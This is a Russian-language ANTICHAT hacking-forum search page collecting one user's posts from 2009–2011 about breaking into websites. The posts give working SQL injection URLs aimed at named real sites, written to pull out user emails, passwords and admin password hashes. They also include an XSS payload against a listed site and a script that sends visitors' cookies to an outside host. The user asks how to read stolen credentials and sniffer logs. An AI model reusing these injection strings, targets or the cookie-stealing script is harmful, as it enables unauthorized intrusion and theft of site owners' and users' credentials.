HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Вернуться   ANTICHAT > Поиск по форуму
Перезагрузить страницу Результаты поиска
Страница 1 из 2 1 2 >
Показано с 1 по 25 из 40.
На поиск затрачено 0.01 сек. Поиск: Сообщения от: KREGI
Раздел: Уязвимости 20.03.2011, 23:39
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
ну не только в титл... помню просто читал про...

ну не только в титл... помню просто читал про похожую скулю на дле... вот и подумалось...
Раздел: Уязвимости 20.03.2011, 16:03
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
там защита от xss

там защита от xss
Раздел: Уязвимости 20.03.2011, 15:15
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
хм, а что же?

хм, а что же?
Раздел: Уязвимости 20.03.2011, 14:39
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
привет есть сайт на DLE, версию не знаю ...

привет

есть сайт на DLE, версию не знаю

есть уязвимость вида


http://site.ru/index.php?subaction=userinfo&user=%2527

при подстановки sql запроса, все что я написал выводится в title,...
Раздел: Уязвимости 01.02.2011, 14:18
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
что дает эта ошибка, кроме раскрытия путей? ...

что дает эта ошибка, кроме раскрытия путей?

Fatal error: Uncaught exception 'E_NOTICE' with message 'Undefined variable: text_block' in [path]:62 Stack trace: #0 [path](62):...
Раздел: Уязвимости 22.12.2010, 02:03
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
pinch, хм, ладно, искать меньше всего хочется....

pinch, хм, ладно, искать меньше всего хочется. выложу в паблик, мб кому и пригодится )) спасибо)))
Раздел: Уязвимости 22.12.2010, 02:03
Ответов: 16,037
Важно: SQL Инъекции
Просмотров: 1,098,861
Автор KREGI
ТИЦ 10 PR 3 ...

ТИЦ 10

PR 3


http://www.printeffect.ru/product.php?tp=1+and+2=0+union%20select%20concat_ws%280x3a,email,password%29+from+users
Раздел: Уязвимости 22.12.2010, 01:20
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
Забрал из базы скулей мыло и пароль, но они в...

Забрал из базы скулей мыло и пароль, но они в таком виде:

email

>VР&:WмєZxw9•

password

}G©џЗи
Раздел: Уязвимости 12.12.2010, 01:15
Ответов: 533
Важно: Активные Xss
Просмотров: 92,060
Автор KREGI
ТИЦ 500 http://www.indarnb.ru/add-preview/ ...

ТИЦ 500

http://www.indarnb.ru/add-preview/

Уязвимы все поля

">alert(document.cookie)
Раздел: Уязвимости 20.10.2010, 20:38
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
http://www.site.ru/index.php?id=106 and...

http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5

без ошибок - следовательно 5 версия.

R1dex мне подсобил уже с этой скулей,

вот такой запрос работает

24 and 1=0 union...
Раздел: Уязвимости 20.10.2010, 10:23
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
я пробовал по разному, если...

я пробовал по разному, если http://www.site.ru/index.php?id=-36+union+select+null,null,null,null,null,null,null ,null,null,null
...
Раздел: Уязвимости 19.10.2010, 23:56
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
есть сайт, на нем 100% SQL уязвимость,знаю точно...

есть сайт, на нем 100% SQL уязвимость,знаю точно ,что число колонок 10, union select Не выводит не чего, ошибки не выдает на

http://www.site.ru/index.php?id=36+union+select+1,2,3,4,5,6,7,8,9,10...
Раздел: Уязвимости 16.10.2010, 11:24
Ответов: 16,037
Важно: SQL Инъекции
Просмотров: 1,098,861
Автор KREGI
PR 4 195.8.80.50 blunt ...

PR 4

195.8.80.50

blunt

5.0.77-log

unknown-linux-gnu
Раздел: Уязвимости 16.10.2010, 01:58
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
_http://pogoda.v.ua/index.php?id=-264%20Union%20Se...

_http://pogoda.v.ua/index.php?id=-264%20Union%20Select%20%201%20,%20version%28%29%20,3,4,5

Tag title

Интересно кому?

...
Раздел: Уязвимости 16.10.2010, 01:28
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
http://www.scrz.ru/show_part.php?id=2061+and+1=0+=...

http://www.scrz.ru/show_part.php?id=2061+and+1=0+=null=null%20union%20select+1,database%28%29,3,4,5,6,7,8,9,10,11,%2012,13,14,user%28%29,version%28%29,17,18,19,20

ну а дальше блокирует как бы...
Раздел: Уязвимости 16.10.2010, 00:05
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
Логин админа ...

Логин админа

http://www.pro-projector.ru/news_N.php?id_page=13+and+1=0+%20Union%20Select%20%201,2,3,user_name,5,6,7,8,9%20from%20proproj_sugarcrm.users

Хеш пароля админа
...
Раздел: Уязвимости 11.10.2010, 19:34
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
Получил печеньки с xss уявимости, а там больше...

Получил печеньки с xss уявимости, а там больше параметров чем при простом посещении сайта, подставляю только те что есть - не работает, создаю новые, которых нет, но которые пришли от чувака - не...
Раздел: Уязвимости 27.10.2009, 11:22
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
ребят, а еще есть какой нить способ по моему...

ребят, а еще есть какой нить способ по моему сайту?
Раздел: Уязвимости 27.10.2009, 10:54
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
<script> img = new Image(); img.src =...

<script>
img = new Image(); img.src = "http://faiki.hut2.ru/s.gif"+document.cookie;
</script>

Вот такой код, в писываю в адрессную строку, в поле поиска появляется img new image();
Раздел: Уязвимости 27.10.2009, 10:51
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
HAXTA4OK проверил ка4к ты сказал, не пришли,...

HAXTA4OK проверил ка4к ты сказал, не пришли, блин. можешь посмотреть что я не так сделал?
Раздел: Уязвимости 27.10.2009, 10:50
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
HAXTA4OK, понял, вечером проверю логи сниффера,...

HAXTA4OK, понял, вечером проверю логи сниффера, вдруг что нить получиться))
Раздел: Уязвимости 27.10.2009, 10:48
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
HAXTA4OK куки ведь получаться сразу, или только...

HAXTA4OK куки ведь получаться сразу, или только когда админ сайта зайдет на сайт? просто пока что куков нет...
Раздел: Уязвимости 27.10.2009, 10:43
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
как проверить прошла атака или нет?

как проверить прошла атака или нет?
Раздел: Уязвимости 27.10.2009, 10:20
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
Ну что ж, спасибо кто помогал, теперь как я...

Ну что ж, спасибо кто помогал, теперь как я понимаю надо ждать результата в сниффере?
Раздел: Уязвимости 27.10.2009, 01:19
Ответов: 24,371
Просмотров: 619,667
Автор KREGI
ага понял тебя, только вот сниффер не писал не...

ага понял тебя, только вот сниффер не писал не когда, мб есть какой нить готовый исходник?
Показано с 1 по 25 из 40.
Страница 1 из 2 1 2 >

 
Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.